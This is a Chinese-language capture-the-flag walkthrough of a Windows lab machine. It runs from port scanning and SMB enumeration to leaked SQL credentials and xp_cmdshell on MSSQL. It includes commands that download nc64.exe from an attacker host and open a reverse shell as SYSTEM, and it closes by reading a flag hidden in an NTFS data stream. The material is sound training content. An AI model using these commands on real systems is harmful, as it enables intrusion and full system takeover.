靶机地址:https://thehackerslabs.com/accounting/
第一次玩TheHackerLabs的靶机,还是先继续win系统的。
Tips: mssql基本操作、NTFS数据流
扫描一下端口,发现开着smb和9081的http,以及一个mssql端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
5040/tcp open unknown
9047/tcp open unknown
9079/tcp open unknown
9080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9081/tcp open http Microsoft Cassini httpd 4.0.1.6 (ASP.NET 4.0.30319)
| http-title: Login Saci
|_Requested resource was /App/Login.aspx
|_http-server-header: Cassini/4.0.1.6
9083/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9147/tcp open unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
49992/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| 192.168.56.136\COMPAC:
| Target_Name: DESKTOP-M464J3M
| NetBIOS_Domain_Name: DESKTOP-M464J3M
| NetBIOS_Computer_Name: DESKTOP-M464J3M
| DNS_Domain_Name: DESKTOP-M464J3M
| DNS_Computer_Name: DESKTOP-M464J3M
|_ Product_Version: 10.0.19041
| ms-sql-info:
| 192.168.56.136\COMPAC:
| Instance name: COMPAC
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 49992
|_ Clustered: false
|_ssl-date: 2024-11-08T19:22:50+00:00; +15h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-08T19:12:10
|_Not valid after: 2054-11-08T19:12:10
MAC Address: 08:00:27:B5:DE:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows先利用netexec找出用户名。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB 192.168.56.136 445 DESKTOP-M464J3M [*] Windows 10 / Server 2019 Build 19041 x64 (name:DESKTOP-M464J3M) (domain:DESKTOP-M464J3M) (signing:False) (SMBv1:False)
SMB 192.168.56.136 445 DESKTOP-M464J3M [+] DESKTOP-M464J3M\anonymous: (Guest)
SMB 192.168.56.136 445 DESKTOP-M464J3M 500: DESKTOP-M464J3M\Administrador (SidTypeUser)
SMB 192.168.56.136 445 DESKTOP-M464J3M 501: DESKTOP-M464J3M\Invitado (SidTypeUser)
SMB 192.168.56.136 445 DESKTOP-M464J3M 503: DESKTOP-M464J3M\DefaultAccount (SidTypeUser)
SMB 192.168.56.136 445 DESKTOP-M464J3M 504: DESKTOP-M464J3M\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.56.136 445 DESKTOP-M464J3M 513: DESKTOP-M464J3M\Ninguno (SidTypeGroup)
SMB 192.168.56.136 445 DESKTOP-M464J3M 1001: DESKTOP-M464J3M\contpaqi (SidTypeUser)
SMB 192.168.56.136 445 DESKTOP-M464J3M 1002: DESKTOP-M464J3M\SQLServer2005SQLBrowserUser$DESKTOP-M464J3M (SidTypeAlias)
SMB 192.168.56.136 445 DESKTOP-M464J3M 1003: DESKTOP-M464J3M\admin (SidTypeUser)以空目录查看smb,发现Compac目录可读。
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.136 445 DESKTOP-M464J3M [*] Windows 10 / Server 2019 Build 19041 x64 (name:DESKTOP-M464J3M) (domain:DESKTOP-M464J3M) (signing:False) (SMBv1:False)
SMB 192.168.56.136 445 DESKTOP-M464J3M [+] DESKTOP-M464J3M\null:
SMB 192.168.56.136 445 DESKTOP-M464J3M [+] Enumerated shares
SMB 192.168.56.136 445 DESKTOP-M464J3M Share Permissions Remark
SMB 192.168.56.136 445 DESKTOP-M464J3M ----- ----------- ------
SMB 192.168.56.136 445 DESKTOP-M464J3M ADMIN$ Admin remota
SMB 192.168.56.136 445 DESKTOP-M464J3M C$ Recurso predeterminado
SMB 192.168.56.136 445 DESKTOP-M464J3M Compac READ,WRITE
SMB 192.168.56.136 445 DESKTOP-M464J3M IPC$ READ IPC remota
SMB 192.168.56.136 445 DESKTOP-M464J3M Users READ以空账户或者任意用户名登录smb,循环把所有文件下载下来。
└─$ smbclient -N //$IP/Compac
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 9 04:51:38 2024
.. D 0 Sat Nov 9 04:51:38 2024
Empresas D 0 Sat May 11 10:49:15 2024
Index D 0 Sat Nov 9 04:03:09 2024
5113953 blocks of size 4096. 961603 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *下面有两条路,一条是9081端口开的http服务还没有检索,扫描一下目录。
└─$ cat 9081.log
/images (Status: 302) [Size: 125] [--> /images/]
/download (Status: 302) [Size: 127] [--> /download/]
/img (Status: 302) [Size: 122] [--> /img/]
/default.aspx (Status: 302) [Size: 132] [--> /App/Login.aspx]
/docs (Status: 302) [Size: 123] [--> /docs/]
/Images (Status: 302) [Size: 125] [--> /Images/]
/Default.aspx (Status: 302) [Size: 132] [--> /App/Login.aspx]
/scripts (Status: 302) [Size: 126] [--> /scripts/]
/add (Status: 302) [Size: 122] [--> /add/]
/css (Status: 302) [Size: 122] [--> /css/]
/Download (Status: 302) [Size: 127] [--> /Download/]
/app (Status: 302) [Size: 122] [--> /app/]
/Docs (Status: 302) [Size: 123] [--> /Docs/]在Download目录下发现
└─$ curl http://192.168.56.136:9081/download/notas.txt
supervisor
supervisor
浏览下载后的文件,在Download目录下发现notas.txt,里面有个用户名和密码。
└─$ curl http://192.168.56.136:9081/download/notas.txt
supervisor
superviso使用这个密码可以登录9081的APP,但无法找到利用漏洞。
└─$ searchsploit contpaq
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path | windows/local/50690.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results回到第二条路,从本地下载smb的文件里找敏感信息,找到另一个用户名密码。
└─$ cat Empresas/SQL.txt
SQL 2017
Instancia COMPAC
sa
Contpaqi2023.
ip
127.0.0.1
Tip para terminar instalaciones
1) Ejecutar seguridad de icono
Sobre el icono asegurarse que diga ejecutar como Administrador.
2) Ejecutar el comando regedit...
Buscar la llave Hkey Local Machine, luego Software, luego Wow32, Computacion en Accion...(abri pantalla con boton del lado derecho
donde dice seguridad y ver que aparezca "everyone" y darle control total尝试使用mssqlclient登录mssql的49992端口。
└─$ mssqlclient.py -p 49992 sa:'Contpaqi2023.'@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DESKTOP-M464J3M\COMPAC): Line 1: Changed database context to 'master'.
[*] INFO(DESKTOP-M464J3M\COMPAC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (sa dbo@master)> 这个系统可以执行xp_cmdshell,先看一下权限和当前目录。
SQL (sa dbo@master)> xp_cmdshell cd
output
-------------------
C:\Windows\system32
NULL
SQL (sa dbo@master)> xp_cmdshell whoami
output
-------------------
nt authority\system下面就是上传shell了。我使用msfvenom制作的shell上传后运行总是出错,只能使用nc,但要注意版本兼容性。不兼容的nc运行后错误如下:
SQL (sa dbo@master)> xp_cmdshell "\\192.168.56.101\kali\nc64.exe 192.168.56.101 1234 -e cmd"
output
--------------------------------------------------------------------------------
Esta versión de \\192.168.56.101\kali\nc64.exe no es compatible con la versión de Windows que está ejecutando. Compruebe la información de sistema del equipo y después póngase en contacto con el anunciante de software.兼容win10的nc地址:https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
我们将nc64.exe下载到本机,在本机建立http服务,靶机下载成功(这里也可用impacket-smbserver建立 smb服务器)。
SQL (sa dbo@master)> xp_cmdshell "curl -O http://192.168.56.101/nc64.exe"
output
--------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 45272 100 45272 0 0 3486k 0 --:--:-- --:--:-- --:--:-- 3684k 靶机运行上传的nc。
SQL (sa dbo@master)> xp_cmdshell "nc64.exe 192.168.56.101 1234 -e cmd"本机监听后可以得到shell。查看权限,是系统权限。
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.136] 49746
Microsoft Windows [Versin 10.0.19045.2965]
(c) Microsoft Corporation. Todos los derechos reservados.
C:\>whoami /priv
whoami /priv
Nombre de privilegio Descripcin Estado
========================================= =================================================================== =============
SeAssignPrimaryTokenPrivilege Reemplazar un smbolo (token) de nivel de proceso Deshabilitado
SeLockMemoryPrivilege Bloquear pginas en la memoria Habilitada
SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Deshabilitado
SeTcbPrivilege Actuar como parte del sistema operativo Habilitada
SeSecurityPrivilege Administrar registro de seguridad y auditora Deshabilitado
SeTakeOwnershipPrivilege Tomar posesin de archivos y otros objetos Deshabilitado
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Deshabilitado
SeSystemProfilePrivilege Generar perfiles del rendimiento del sistema Habilitada
SeSystemtimePrivilege Cambiar la hora del sistema Deshabilitado
SeProfileSingleProcessPrivilege Generar perfiles de un solo proceso Habilitada
SeIncreaseBasePriorityPrivilege Aumentar prioridad de programacin Habilitada
SeCreatePagefilePrivilege Crear un archivo de paginacin Habilitada
SeCreatePermanentPrivilege Crear objetos compartidos permanentes Habilitada
SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Deshabilitado
SeRestorePrivilege Restaurar archivos y directorios Deshabilitado
SeShutdownPrivilege Apagar el sistema Deshabilitado
SeDebugPrivilege Depurar programas Habilitada
SeAuditPrivilege Generar auditoras de seguridad Habilitada
SeSystemEnvironmentPrivilege Modificar valores de entorno firmware Deshabilitado
SeChangeNotifyPrivilege Omitir comprobacin de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estacin de acoplamiento Deshabilitado
SeManageVolumePrivilege Realizar tareas de mantenimiento del volumen Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticacin Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeTimeZonePrivilege Cambiar la zona horaria Habilitada
SeCreateSymbolicLinkPrivilege Crear vnculos simblicos Habilitada
SeDelegateSessionUserImpersonatePrivilege Obtn un token de suplantacin para otro usuario en la misma sesin Habilitada使用这个用户,可以很方便拿到user flag,但在显示root flag时,发现了图案,应该是root flag被隐藏了。
C:\Users\admin\Desktop>type root.txt
type root.txt
____...
.-"--"""".__ `.
| ` |
( `._....------.._.:
) .()'' ``().
' () .==' `=== `-.
. ) ( g)
) ) / J
( |. / . (
$$ (. (_'. , )|`
|| |\`-....--'/ ' \
/||. \\ | | | / / \.
//||(\ \`-===-' ' \o.
.//7' |) `. -- / ( OObaaaad888b.
(<<. / | .a888b`.__.'d\ OO888888888888a.
\ Y' | .8888888aaaa88POOOOOO888888888888888.
\ \ | .888888888888888888888888888888888888b
| | .d88888P88888888888888888888888b8888888.
b.--d .d88888P8888888888888888a:f888888|888888b
88888b 888888|8888888888888888888888888\8888888 查看NTFS数据流,得到root flag。
C:\Users\admin\Desktop>dir /r
dir /r
El volumen de la unidad C no tiene etiqueta.
El nmero de serie del volumen es: A622-5802
Directorio de C:\Users\admin\Desktop
05/10/2024 07:12 PM <DIR> .
05/10/2024 07:12 PM <DIR> ..
05/10/2024 07:05 PM 1,192 root.txt
35 root.txt:HI:$DATA
C:\Users\admin\Desktop>more < root.txt:HI:$DATA
more < root.txt:HI:$DATA